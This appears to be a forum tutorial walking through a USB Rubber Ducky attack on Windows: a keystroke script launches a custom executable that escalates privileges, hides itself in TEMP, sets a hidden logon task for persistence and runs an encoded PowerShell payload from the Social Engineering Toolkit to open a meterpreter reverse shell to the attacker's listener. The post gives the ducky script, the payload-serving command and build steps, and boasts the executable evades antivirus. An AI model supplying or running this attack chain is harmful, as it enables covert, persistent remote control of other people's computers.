Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later).
What the executable does:
- Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user.
- Depending on privilege level, either continue execution or attempt to elevate.
(- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y')
- Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden.
- Creates a hidden Task Scheduler task which runs the executable on each user logon.
- Executes encoded Powershell payload.
Why smart privilege checking is important:
If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear:
This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this:
This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away!
What you'll need:
- Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).
- Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload.
- USB Rubber ducky (with Twin Duck or similar firmware installed)
- This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before)
- On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.
- You will be presented with various options, hit '1' and then enter.
- Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.
- More options, hit '1' and then enter.
- Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding)
- Give it a port and then say 'yes' when it asks if you want to start the listener.
- Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'
- You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt'
You should be faced with this screen:
- Select all the text and copy it.
- Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:
- Go to the line with the pre-inserted Powershell payload (Line 64):
- Replace the text within the double quotes with your payload you got from the web server earlier.
- Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them.
- Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need.
- Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive.
- Now we need our ducky payload, here is the code:
REM Awesome script
STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
- Generate your inject.bin file with an encoder.
- Copy the inject.bin to your Ducky's drive and there we have it!
- The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script.
- Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works!
So tell me what you think, feedback is greatly appreciated!